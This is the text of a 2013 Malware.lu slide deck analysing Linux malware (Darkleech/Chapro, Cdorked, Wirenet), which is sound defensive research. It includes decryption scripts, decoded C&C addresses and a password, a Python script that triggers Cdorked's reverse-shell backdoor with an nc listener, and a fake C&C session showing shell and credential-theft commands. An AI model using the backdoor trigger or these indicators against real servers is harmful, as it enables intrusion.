Linux malware presentation Linux malware presentation @r00tbsd – Paul Rascagnères Malware.lu July 2013 @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Presentation Who am I? Paul Rascangères - @r00tbsd or @malware.lu. Creator and maintener of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication” @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Presentation Why am I here and why this talk? Some people think that malware don't exist on Linux platform. 4 examples in 2012/2013: - Darkleech (Apache module) - Cdorked (Apache server) - wirenet (Remote Administration Tool) - gift... @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro First seen The first version was identify in August 2012. How does it work? This malware is an apache module. The module is executed by LoadModule command and defines in the module configuration file. Features: - inject JavaScript code to redirect users on infected Website - backdoor @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis - module Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so Example: mod_sec2_config.so Module execution: cat /etc/apache2/modules/[VARIOUS].conf LoadModule sec2_config_module modules/mod_sec2_config.so Analysis - Symptoms The malware injects Exploit Kits (JS) on the Web pages: @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis - Symptoms @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Symptoms The redirection is performed by a JavaScript insertion (IFrame): @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Targets selection The targets selection is performed thanks to the REFERER. C_ARRAY_BAN_USERAGENT: SAFARI YANDEX OPERA CRAWLER FIREFOX JIKE CHROME SPIDER GOOGLEBOT ROBOT SLURP PAPERLIBOT YAHOO SNAPPREVIEWBOT BING BUFFERBOT LINUX MEDIAPARTNERS OPENBSD HATENA MACINTOSH BLUEDRAGON MAC OS WORDPRESS IPHONE XIANGUO ... @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Reversing The data are encoded in the file: @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Reversing Several function (symbols) are linked to the encoding: - 0x17C8 xor_decrypt_string - 0x17ED xor_encrypt_string - 0x1800 xor_encrypt @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Reversing xor_decrypt_string pseudo-C xor_decrypt_string(A8, Ac, A10, A14) { L00003117(); ebx = ebx + 0x5001; esp = esp - 0xc; Vfffffff4 = A14 + 1; *esp = *( *( *( *(ebx + -300)) + 0xc)); *(ebp - 0x10) = L00002D90(); if(A14 > 0) { ecx = 0; do { edx = 0; eax = 0; edx = 0 >> 0x1f; Ac = Ac / Ac; al = *A10 & 0xff ^ *(Ac % Ac + A8); *( *(ebp - 0x10)) = al; } while(1 != A14); } esi = *(ebp - 0x10); *(esi + A14) = 0; eax = esi; esp = esp + 0xc;} @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Reversing xor_decrypt_string python implementation : fd.seek(0x84a0) key = fd.read(23) for s in tab: fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key))) clear_text = decrypted.split('\x00')[0] print('%s: %s') % (s['name'], clear_text) @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Darkleech/Chapro Analysis – Reversing $ python sec2.py "./mod_sec2_config.so" C_MODULE_VERSION: "2012.12.14" C_CC_HOST: "217.23.13.6" C_CC_URI: "/Home/index.php" C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1" Host: "%s" Content-Type: "application/x-www-form-urlencoded" Content-Length:" %i %s" C_MARKER_LEFT: "{{{" C_MARKER_RIGHT: "}}}" C_TMP_DIR: "/" C_LIST_PREF: "sess_" C_COOKIE_NAME: "PHP_SESSION_ID=" C_ARRAY_TAGS_FOR_INJECT: " < /script > < /style > < /head > < /title > ... @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Cdorked Presentation Unliked it brother Darkleech/Chapro, Cdorked is not an Apache module but a custom apache server. The malware used a XOR to encrypt strings: fd.seek(0x16B460) # XOR key key = fd.read(24) for i, s in enumerate(tab): fd.seek(s['offset']) data = fd.read(s['size']) decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key))) print('xx%s: %s') % (i, decrypted) @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Cdorked How to get a shell ? - request @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Cdorked How to get a shell ? - encryption @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Cdorked How to get a shell ? - encryption Here is the code: ip = $client_ip key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5 key[1] = ( (ip AND 0xFF0000 ) >> 16 ) + 33 key[2] = ( (ip AND 0xFF00 ) >> 8 ) + 55 key[3] = ( (ip ) ) + 78 @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Cdorked How to get a shell ? - the reverse-shell import urllib2 import subprocess import os LHOST = '192.168.56.1' LPORT = '4444' RHOST = '192.168.56.101' RPORT = '80' param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex') request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param) if os.fork(): req = urllib2.Request(request) req.add_header('X-Real-IP', '251.223.201.178') urllib2.urlopen(req) else: subprocess.call(['nc', '-l', LPORT]) @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Plan - Presentation - Darkleech/Chapro - Cdorked - Wirenet - Conclusion @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Strings obfuscation The attacker used RC4 algorithm to encrypt configuration: @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Strings obfuscation fp = open(sys.argv[1]) fp.seek(0xf4d8, 0) key = fp.read(16) for c in crypted: rc4 = ARC4.new(key) fp.seek(c['adr']) data = fp.read(c['len']) val = rc4.decrypt(data).split('\x00')[0] print "%s: %s" % (c['name'], val) if c['name'] == 'BoolSettingsByte': for name, o in options.iteritems(): print "%s: %s" % (name, isOption(val, o)) @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Strings obfuscation y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e ConnectionString: 212.7.208.65:4141; ProxyString: - Password: sm0k4s523syst3m523 HostId: LINUX MutexName: vJEewiWD InstallPath: %home%/WIFIADAPT StartupKeyName1: WIFIADAPTER StartupKeyName2: - KeyLoggerFileName: %Home%\.m8d.dat BoolSettingsByte: 237 run_as_daemon: True xinit_start: False install_file: True lock_file?: True keylogger: True single_instance: True desktop_start: True ConnectionType: 001 @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Fake C&C wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Fake C&C 127.0.0.1:52956 $ info arch: LINUX name: rootbsd @ alien DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS" 127.0.0.1:52956 $ shell Shell is start with /bin/sh (EOF to exit) id uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),11 8(admin),124(sambashare),1001(bumblebee) Shell is stop @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation Wirenet Fake C&C wirenet $ New session 127.0.0.1:52956 wirenet $ session 0 127.0.0.1:52956 LINUX rootbsd @ alien wirenet $ session 0 Switch to session 0 context 127.0.0.1:52956 $ help Undocumented commands: ====================== EOF cred_thunderbird get log_clear mkdir rm shell cp creds help log_get mv screen cred_pidgin exit info ls ps session @r00tbsd – Paul Rascagnères from Malware.lu
Recommend
More recommend